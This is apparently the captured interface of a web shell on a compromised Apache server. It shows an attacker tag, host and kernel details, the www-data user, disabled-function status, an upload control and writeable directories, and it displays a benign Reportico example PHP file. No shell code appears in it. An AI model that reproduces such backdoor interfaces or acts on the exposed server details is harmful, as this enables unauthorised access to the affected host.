Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/dev/htdocs/custom/reportes/include/reportico/examples/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/dev/htdocs/custom/reportes/include/reportico/examples/examples/project-execute.php
<?php
include (__DIR__."/header.php");

$description = " <br><br>To run an existing report stored by the designer just load the project, the report and erxecute it";
$example_description = "In the example, the tutorials projects is loaded, the stock report is loaded and executed";


$usage_method = "
<?php
\Reportico\Engine\Builder::build()
    ->project(\"project\")
    ->load(\"reportfile\")
    ->execute();
?>
";

include (__DIR__."/content.php");
include (__DIR__."/trailer.php");


Hry